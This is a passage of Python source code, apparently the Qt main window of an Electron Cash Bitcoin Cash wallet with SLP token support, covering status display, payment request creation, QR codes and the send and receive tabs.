def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
sats_per_byte = format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1))
return _('{sats_per_byte} sat/byte').format(sats_per_byte=sats_per_byte)
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
def update_status(self):
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
"seed_ok" : QIcon(":icons/seed.png"),
"seed_warning" : QIcon(":icons/seed_warning.png")
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
text = ""
if not self.is_slp_wallet:
text += "Tokens Disabled - "
else:
token_id = self.slp_token_id
try:
d = self.wallet.token_types[token_id]
except (AttributeError, KeyError):
pass
else:
bal = format_satoshis_nofloat(self.wallet.get_slp_token_balance(token_id, { 'user_config': { 'confirmed_only': False } })[0],
decimal_point=d['decimals'],)
text += "%s Token Balance: %s; "%(d['name'], bal)
c, u, x = self.wallet.get_balance()
text += _("BCH Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text += " " + ( _("[%d unverified TXs]") % n_unverif )
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
# Provide extra warning and instructions to user if he/she has tokens in a non-SLP wallet type.
if not self.is_slp_wallet:
locked_in_slp = self.wallet.get_slp_locked_balance()
if locked_in_slp > 0:
self._warn_slp_prefers_slp_wallets_if_not_slp_wallet()
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
addr_format = self.config.get('addr_format', 1)
self.setAddrFormatText(addr_format)
self.status_button.setIcon( icon )
self.status_button.setStatusTip( status_tip )
if self.wallet.has_seed():
if self.wallet.storage.get('wallet_seed_needs_backup'):
self.seed_button.setIcon(icon_dict["seed_warning"])
self.seed_button.setToolTip(_("Seed Requires Backup!"))
self.seed_button.setStatusTip(self.seed_button.toolTip())
else:
self.seed_button.setIcon(icon_dict["seed_ok"])
self.seed_button.setToolTip(_("Seed"))
self.seed_button.setStatusTip(None)
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def create_slp_history_tab(self):
from .slp_history_list import HistoryList
self.slp_history_list = l = HistoryList(self)
return self.create_list_tab(l)
def show_address(self, addr, *, parent=None):
parent = parent or self.top_level_window()
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def addr_toggle_slp(self, force_slp=False):
def present_slp():
self.toggle_cashaddr(2, True)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
if force_slp:
present_slp()
return
if Address.FMT_UI == Address.FMT_SLPADDR:
self.toggle_cashaddr(1, True)
self.receive_token_type_combo.setCurrentIndex(0)
else:
present_slp()
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
if self.is_slp_wallet:
self.show_slp_addr_btn = QPushButton(_('Show Token Address'))
self.show_slp_addr_btn.clicked.connect(self.addr_toggle_slp)
grid.addWidget(self.show_slp_addr_btn, 1, 1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_message_e, 2, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_opreturn_e, 3, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 3, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
msg = _('Select the SLP token to Request.')
self.receive_token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.receive_token_type_combo.setItemDelegate(QStyledItemDelegate(self.receive_token_type_combo))
self.receive_token_type_combo.setFixedWidth(200)
self.receive_token_type_combo.currentIndexChanged.connect(self.on_slptok_receive)
#self.receive_token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.receive_slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.receive_slp_token_type_label, 4, 0)
grid.addWidget(self.receive_token_type_combo, 4, 1)
self.receive_slp_amount_e = SLPAmountEdit('tokens', 0)
self.receive_slp_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_slp_amount_label = QLabel(_('Req. token amount'))
grid.addWidget(self.receive_slp_amount_label, 5, 0)
grid.addWidget(self.receive_slp_amount_e, 5, 1)
self.receive_slp_amount_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
self.receive_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_amount_label = QLabel(_('Requested &amount'))
self.receive_amount_label.setBuddy(self.receive_amount_e)
grid.addWidget(self.receive_amount_label, 6, 0)
grid.addWidget(self.receive_amount_e, 6, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
if Address.FMT_UI != Address.FMT_SLPADDR:
self.receive_token_type_combo.setDisabled(True)
self.receive_slp_token_type_label.setDisabled(True)
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
else:
self.receive_token_type_combo.setDisabled(False)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 6, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([_(i[0]) for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 7, 0)
grid.addWidget(self.expires_combo, 7, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.hide()
grid.addWidget(self.expires_label, 7, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(self, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 8, 1, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
slf = weakSelf()
if slf:
slf.check_and_reset_receive_address_if_needed()
if self.main_window.is_slp_wallet:
if Address.FMT_UI == Address.FMT_SLPADDR:
self.main_window.show_slp_addr_btn.setText("Show BCH Address")
else:
self.main_window.show_slp_addr_btn.setText("Show Token Address")
else:
self.main_window.toggle_cashaddr(1, True)
w = ReceiveTab()
w.low_balance_warning_shown = False
w.main_window = self
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw, token_id=req.get('token_id'))
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
if self.receive_token_type_combo.currentData() is not None:
amount = float(self.receive_slp_amount_e.text())
else:
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
if self.receive_token_type_combo.currentData() is not None:
tokenid = self.receive_token_type_combo.currentData()
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, token_id=tokenid, **kwargs)
else:
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
self.receive_token_type_combo.setCurrentIndex(0)
self.receive_slp_amount_e.setText("")
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
# creae a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
def update_receive_qr(self):
if self.receive_token_type_combo.currentData() is not None and self.receive_slp_amount_e.text() is not '':
amount = self.receive_slp_amount_e.text() # if self.receive_slp_amount_e.text() is not '' else None
token_id = self.receive_token_type_combo.currentData()
else:
amount = self.receive_amount_e.get_amount()
token_id = None
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
elif not token_id:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
else:
uri = web.create_URI(self.receive_address, amount, message, **kwargs, token_id=token_id)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
if self.is_slp_wallet:
if Address.FMT_UI == Address.FMT_SLPADDR:
self.show_slp_addr_btn.setText("Show BCH Address")
else:
self.show_slp_addr_btn.setText("Show Token Address")
def on_slptok(self):
self.slp_token_id = self.token_type_combo.currentData()
self.payto_e.check_text()
self.slp_amount_e.setText("")
if self.slp_token_id is None:
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
self.slp_extra_bch_cb.setHidden(True)
self.slp_amount_e.setDisabled(True)
self.slp_max_button.setDisabled(True)
self.slp_amount_label.setDisabled(True)
self.message_opreturn_e.setEnabled(True)
self.opreturn_rawhex_cb.setEnabled(True)
self.opreturn_label.setEnabled(True)
else:
self.slp_extra_bch_cb.setHidden(False)
self.slp_extra_bch_cb.setChecked(False)
self.slp_extra_bch_cb.clicked.emit()
self.slp_amount_e.setDisabled(False)
self.slp_max_button.setDisabled(False)
self.slp_amount_label.setDisabled(False)
tok = self.wallet.token_types[self.slp_token_id]
self.slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
self.message_opreturn_e.setEnabled(False)
self.message_opreturn_e.setText('')
self.opreturn_rawhex_cb.setEnabled(False)
self.opreturn_label.setEnabled(False)
self.update_status()
self.do_update_fee()
def on_slptok_receive(self):
self.receive_slp_amount_e.setText("")
self.receive_amount_e.setText("")
slp_token_id = self.receive_token_type_combo.currentData()
self.update_receive_qr()
if slp_token_id is None:
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
self.receive_amount_e.setDisabled(False)
self.receive_amount_label.setDisabled(False)
self.fiat_receive_e.setDisabled(False)
else:
self.addr_toggle_slp(True)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.receive_amount_e.setDisabled(True)
self.receive_amount_label.setDisabled(True)
self.fiat_receive_e.setDisabled(True)
tok = self.wallet.token_types[slp_token_id]
self.receive_slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
def on_slp_extra_bch(self):
if self.slp_extra_bch_cb.isChecked():
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
else:
self.amount_e.setText('')
self.max_button.setChecked(False)
self.amount_e.setDisabled(True)
self.amount_label.setDisabled(True)
self.max_button.setDisabled(True)
self.fiat_send_e.setDisabled(True)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.parent = self
self.slp_send_tab_widgets = []
if self.is_slp_wallet:
self.slp_amount_e = SLPAmountEdit('tokens', 0)
self.token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.token_type_combo.setItemDelegate(QStyledItemDelegate(self.token_type_combo))
self.token_type_combo.setFixedWidth(200)
self.token_type_combo.currentIndexChanged.connect(self.on_slptok)
self.token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.slp_send_tab_widgets += [
self.slp_amount_e, self.token_type_combo
]
# NB: the translators hopefully will not have too tough a time with this
# *fingers crossed* :)
msg = "<span style=\"font-weight:400;\">" + _('Recipient of the funds.') + " " + \
_("You may enter:"
"<ul>"
"<li> Bitcoin Cash <b>Address</b> <b>★</b>"
"<li> Bitcoin Legacy <b>Address</b> <b>★</b>"
"<li> Simple Ledger <b>Address</b>"
"<li> <b>Contact name</b> <b>★</b> from the Contacts tab"
#"<li> <b>CoinText</b> e.g. <i>cointext:+1234567</i>"
"<li> <b>OpenAlias</b> e.g. <i>satoshi@domain.com</i>"
"</ul><br>"
" <b>★</b> = Supports <b>pay-to-many</b>, where"
" you may optionally enter multiple lines of the form:"
"</span><br><pre>"
" recipient1, amount1 \n"
" recipient2, amount2 \n"
" etc..."
"</pre>")
self.payto_label = payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
qmark_help_but = HelpButton(msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
